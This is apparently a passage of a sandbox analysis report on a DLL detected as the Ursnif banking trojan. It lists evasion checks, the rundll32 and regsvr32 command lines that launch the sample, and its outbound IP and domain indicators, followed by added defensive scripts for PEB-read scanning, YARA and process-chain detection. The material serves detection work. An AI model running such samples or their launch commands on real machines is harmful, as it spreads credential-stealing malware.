                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A4AC00 push ecx; ret | 4_2_04A4AC09
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04A4D00C push 00000076h; iretd | 4_2_04A4D01A
                      Source: 9091.dll | Static PE information: section name: .arthros
                      Source: 9091.dll | Static PE information: section name: .preter
                      Source: 9091.dll | Static PE information: section name: .witched
                      Source: 9091.dll | Static PE information: section name: .restitu
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001753 LoadLibraryA,GetProcAddress | 0_2_10001753
                      Source: 9091.dll | Static PE information: real checksum: 0xc73e4 should be: 0xd0994
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara match | File source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking system information)
Source: C:\Windows\System32\loaddll32.exe  Evasive API call chain: NtQuerySystemInformation, DecisionNodes, Sleep
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4532  Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4532  Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4532  Thread sleep count: 37 > 30
Source: C:\Windows\SysWOW64\rundll32.exe  Check user administrative privileges: GetTokenInformation, DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe  Check user administrative privileges: GetTokenInformation, DecisionNodes
Source: C:\Windows\System32\loaddll32.exe  Check user administrative privileges: GetTokenInformation, DecisionNodes

Anti Debugging:

Found API chain indicative of debugger detection
Source: C:\Windows\System32\loaddll32.exe  Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_10001753 LoadLibraryA,GetProcAddress

Contains functionality to read the PEB
In a 32-bit process fs:[30h] is the TEB field holding the PEB pointer; reading it is the first step of the classic PEB.BeingDebugged and PEB.NtGlobalFlag checks. The same five routines appear at the same relative offsets in every process the DLL is loaded into.
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_0091099E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_009108B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_009107C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_0091090D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_00910725 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 3_2_00A408B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 3_2_00A4099E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 3_2_00A407C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 3_2_00A40725 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 3_2_00A4090D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 4_2_00BD08B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 4_2_00BD099E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 4_2_00BD07C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 4_2_00BD0725 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 4_2_00BD090D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 5_2_00B708B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 5_2_00B7099E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 5_2_00B707C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 5_2_00B70725 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 5_2_00B7090D mov eax, dword ptr fs:[00000030h]
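The fs:[30h] reads above are the raw material for a hunt across other dumps. The following scanner is an added example, not code from the report or from the sample: it finds the 'mov r32, fs:[disp32]' instruction family in a raw 32-bit code buffer, reports which register receives the PEB (or TEB) pointer, looks a few bytes ahead for the PEB fields that debugger checks read, and emits an equivalent YARA rule. The sample buffer at the bottom is hand-assembled for the demonstration; the heuristic field check assumes the pointer stays in the register it was loaded into.

```python
"""Scan raw 32-bit x86 code for reads of the PEB pointer at fs:[30h].

Added example, not code from the report or from the sample. The report lists
'mov eax, dword ptr fs:[00000030h]' at several addresses in every process;
this scanner finds that instruction family in a code dump, reports the
register that receives the pointer, and looks a few bytes ahead for the PEB
fields that debugger checks read (BeingDebugged at +0x02, NtGlobalFlag at
+0x68). The sample buffer at the bottom is hand-assembled for the demo.
"""
import struct
from typing import Dict, List, Tuple

FS_PREFIX = 0x64
# ModRM bytes for 'mov r32, fs:[disp32]' (mod=00, rm=101 means a disp32 follows),
# keyed to the destination register encoded in the reg field.
MODRM_DISP32 = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
REG_INDEX = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esp": 4, "ebp": 5, "esi": 6, "edi": 7}

TEB_SELF = 0x18          # TEB.NtTib.Self: second route to the PEB via [teb+0x30]
TEB_PEB = 0x30           # TEB.ProcessEnvironmentBlock (the report's fs:[30h])
PEB_FIELDS = {0x02: "BeingDebugged", 0x68: "NtGlobalFlag"}


def find_fs_reads(code: bytes, wanted=(TEB_PEB, TEB_SELF)) -> List[Tuple[int, str, int]]:
    """Return (offset, register, fs_offset) for every 'mov r32, fs:[disp32]'
    whose displacement is in `wanted`. Two encodings are recognised:
        64 A1 <disp32>          mov eax, fs:[disp32]   (moffs32 form, 6 bytes)
        64 8B <modrm> <disp32>  mov r32, fs:[disp32]   (ModRM form, 7 bytes)
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != FS_PREFIX:
            i += 1
            continue
        if i + 6 <= n and code[i + 1] == 0xA1:
            disp = struct.unpack_from("<I", code, i + 2)[0]
            if disp in wanted:
                hits.append((i, "eax", disp))
            i += 6
            continue
        if i + 7 <= n and code[i + 1] == 0x8B and code[i + 2] in MODRM_DISP32:
            disp = struct.unpack_from("<I", code, i + 3)[0]
            if disp in wanted:
                hits.append((i, MODRM_DISP32[code[i + 2]], disp))
            i += 7
            continue
        i += 1
    return hits


def peb_field_checks(code: bytes, offset: int, reg: str, window: int = 16) -> List[str]:
    """Heuristic follow-up: after the fs read at `offset` into `reg`, look within
    `window` bytes for a [reg+disp8] memory operand whose disp8 is a PEB field
    used by debugger checks. Assumes the pointer stays in the same register
    (true for the hand-built sample; real code may move it first)."""
    want_modrm = 0x40 | REG_INDEX[reg]          # mod=01 (disp8 follows), rm=reg
    start = offset + 6                          # skip the shortest encoding
    end = min(len(code) - 1, start + window)
    found = []
    for j in range(start, end):
        modrm, disp8 = code[j], code[j + 1]
        if (modrm & 0xC7) == want_modrm and disp8 in PEB_FIELDS:
            found.append(PEB_FIELDS[disp8])
    return found


def yara_rule(name: str = "x86_reads_peb_via_fs30") -> str:
    """YARA hex strings for the same instruction family, for hunting in dumps."""
    return (f"rule {name} {{\n"
            "  strings:\n"
            "    $moffs = { 64 A1 30 00 00 00 }\n"
            "    $modrm = { 64 8B (05|0D|15|1D|25|2D|35|3D) 30 00 00 00 }\n"
            "  condition:\n"
            "    any of them\n"
            "}\n")


def scan(code: bytes) -> List[Dict]:
    """Combine both passes into one record per fs read."""
    return [{"offset": off, "reg": reg, "fs_offset": disp,
             "peb_fields": peb_field_checks(code, off, reg)}
            for off, reg, disp in find_fs_reads(code)]


# Constructed test input: hand-assembled 32-bit code using both PEB access routes.
SAMPLE = bytes.fromhex(
    "9090"            # nop; nop
    "64A130000000"    # mov eax, fs:[30h]          (PEB pointer -> eax)
    "80780200"        # cmp byte ptr [eax+2], 0    (PEB.BeingDebugged)
    "7505"            # jne short +5
    "648B1D18000000"  # mov ebx, fs:[18h]          (TEB.NtTib.Self -> ebx)
    "8B5B30"          # mov ebx, [ebx+30h]         (TEB -> PEB)
    "8B4368"          # mov eax, [ebx+68h]         (PEB.NtGlobalFlag)
    "C3"              # ret
)

if __name__ == "__main__":
    for rec in scan(SAMPLE):
        print(f"+0x{rec['offset']:04x}: mov {rec['reg']}, fs:[0x{rec['fs_offset']:x}] "
              f"-> {rec['peb_fields'] or 'no PEB field access nearby'}")
    print(yara_rule())
```

Run against a raw dump of the 0x10000000 image or of the unpacked regions; a hit with no nearby PEB field access is still worth a look, since the pointer may simply have been moved into another register or saved to the stack first.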

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 134.0.117.195 187
Source: C:\Windows\SysWOW64\regsvr32.exe  Domain query: google.mail.com
Source: C:\Windows\SysWOW64\regsvr32.exe  Domain query: firsone1.online
Source: C:\Windows\SysWOW64\regsvr32.exe  Domain query: kdsjdsadas.online
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1

Source: loaddll32.exe, 00000000.00000002.796932415.0000000001280000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.797914818.0000000003260000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.797442073.0000000002F90000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.797503474.0000000002D90000.00000002.00020000.sdmp
  Binary or memory string: Program Manager
  Binary or memory string: Shell_TrayWnd
  Binary or memory string: Progman
  Binary or memory string: Progmanlock

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_00D47A2E cpuid

Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_10001E13 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_10001EE5 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_00D49267 wsprintfA,GetUserNameW,GetComputerNameW,GetUserNameW,GetComputerNameW,WideCharToMultiByte
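The chain shown above (cmd.exe starting rundll32.exe with the DLL export addressed by ordinal, rundll32/regsvr32 loading a DLL out of a user's Desktop, and rundll32.exe then connecting out) is what host-based detection should key on. The following is an added example of that logic, not the report's own and not the Sigma rule it cites. The events are constructed in a Sysmon-like shape and modelled on the report's process tree; the connect port and the regsvr32 command line are assumed, since the report does not print them in this form, and the last two events are a benign control that must not alert.

```python
"""Detection logic for the rundll32/regsvr32 execution chain in the report.

Added example; not the report's logic and not the Sigma rule it cites. The
events are constructed in a Sysmon-like shape, modelled on the process tree
and the connect shown in the report (the port and the regsvr32 command line
are assumed, the report does not print them in this form).
"""
import ipaddress
import re
from typing import Dict, List

HOST_BINARIES = {"rundll32.exe", "regsvr32.exe"}
# '...\x.dll",#1' or '...\x.dll,#1': an export addressed by ordinal instead of name
ORDINAL_CALL = re.compile(r'\.dll"?\s*,\s*#\d+', re.IGNORECASE)
# Quoted or bare Windows path ending in .dll anywhere in the command line
DLL_ARG = re.compile(r'"?([A-Z]:\\[^"]+?\.dll)"?', re.IGNORECASE)
# Directories an unprivileged user can write to
USER_WRITABLE = re.compile(r'^[A-Z]:\\(Users|ProgramData|Windows\\Temp)\\', re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def detect(events: List[Dict]) -> List[Dict]:
    """Run three rules over the event stream and correlate them by PID."""
    alerts: List[Dict] = []
    flagged_pids = set()          # PIDs already suspicious from a process_create rule

    for ev in events:
        if image_name(ev["image"]) not in HOST_BINARIES:
            continue

        if ev["event"] == "process_create":
            cmd = ev["command_line"]
            if ORDINAL_CALL.search(cmd):
                alerts.append({"rule": "call_by_ordinal", "pid": ev["pid"],
                               "severity": "medium", "detail": cmd})
                flagged_pids.add(ev["pid"])
            m = DLL_ARG.search(cmd)
            if m and USER_WRITABLE.match(m.group(1)):
                alerts.append({"rule": "host_binary_loads_user_dll", "pid": ev["pid"],
                               "severity": "medium", "detail": m.group(1)})
                flagged_pids.add(ev["pid"])

        elif ev["event"] == "network_connect" and is_external(ev["dst_ip"]):
            # A host binary talking to the internet is unusual on its own; when the
            # same PID was already flagged it is the injected-code pattern the report shows.
            alerts.append({"rule": "host_binary_external_connect", "pid": ev["pid"],
                           "severity": "high" if ev["pid"] in flagged_pids else "low",
                           "detail": f'{ev["dst_ip"]}:{ev["dst_port"]}'})
    return alerts


# Constructed events (Sysmon-like fields), modelled on the report's process tree.
EVENTS = [
    {"event": "process_create", "pid": 1364, "ppid": 4908,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1'},
    {"event": "process_create", "pid": 5032, "ppid": 1364,
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "command_line": r'rundll32.exe "C:\Users\user\Desktop\9091.dll",#1'},
    {"event": "process_create", "pid": 2332, "ppid": 4908,
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "command_line": r'regsvr32.exe /s C:\Users\user\Desktop\9091.dll'},   # assumed form
    {"event": "network_connect", "pid": 5032,
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "dst_ip": "134.0.117.195", "dst_port": 443},                           # port assumed
    # Benign control: ordinary rundll32 use of a system DLL plus an internal connection
    {"event": "process_create", "pid": 7000, "ppid": 900,
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"event": "network_connect", "pid": 7000,
     "image": r"C:\Windows\System32\rundll32.exe",
     "dst_ip": "10.0.0.5", "dst_port": 445},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f'[{a["severity"]}] {a["rule"]} pid={a["pid"]} {a["detail"]}')
```

The cmd.exe wrapper itself produces no alert; the ordinal call is attributed to the rundll32.exe process it launches, which is also the process that later connects out, so the correlation raises that connect to high severity.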

Stealing of Sensitive Information:

Yara detected Ursnif

Memory dumps (type: MEMORY):
00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp
00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp
00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp
00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp
00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp
00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp
00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp
00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp
00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp
00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp
00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp
00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp
00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp
00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp
00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp
00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp
00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp
00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp
00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp
00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp
00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp
00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp
00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp
00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp
00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp
00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp
00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp
00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp
00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp
00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp
00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp
00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp
00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp
00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp
00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp
00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp
00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp
00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp
00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp
00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp
00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp
00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp
00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp
00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp
00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp
00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp
00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp
00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp

Process memory space (type: MEMORYSTR):
loaddll32.exe PID: 4908
regsvr32.exe PID: 2332
rundll32.exe PID: 5032
rundll32.exe PID: 6008

Unpacked PE files (type: UNPACKEDPE):
0.2.loaddll32.exe.990000.0.raw.unpack
5.2.rundll32.exe.10000000.3.unpack
4.2.rundll32.exe.4400000.0.raw.unpack
4.2.rundll32.exe.10000000.3.unpack
5.2.rundll32.exe.ba0000.0.raw.unpack
3.2.regsvr32.exe.10000000.3.raw.unpack
3.2.regsvr32.exe.a80000.0.raw.unpack
0.2.loaddll32.exe.2b694a0.2.raw.unpack
3.2.regsvr32.exe.2bd0000.1.unpack
5.2.rundll32.exe.46d94a0.2.unpack
3.2.regsvr32.exe.4a994a0.2.unpack
5.2.rundll32.exe.4280000.1.unpack
5.2.rundll32.exe.46d94a0.2.raw.unpack
3.2.regsvr32.exe.10000000.3.unpack
0.2.loaddll32.exe.2b694a0.2.unpack
4.2.rundll32.exe.4a40000.2.unpack
4.2.rundll32.exe.47e94a0.1.raw.unpack
3.2.regsvr32.exe.4a994a0.2.raw.unpack
5.2.rundll32.exe.10000000.3.raw.unpack
0.2.loaddll32.exe.10000000.3.unpack
0.2.loaddll32.exe.d40000.1.unpack
0.2.loaddll32.exe.10000000.3.raw.unpack
4.2.rundll32.exe.47e94a0.1.unpack
4.2.rundll32.exe.10000000.3.raw.unpack

Remote Access Functionality:

Yara detected Ursnif
Source: the same Yara matches as listed under "Stealing of Sensitive Information" above (identical memory dumps, process memory spaces and unpacked PE files).

Mitre Att&ck Matrix

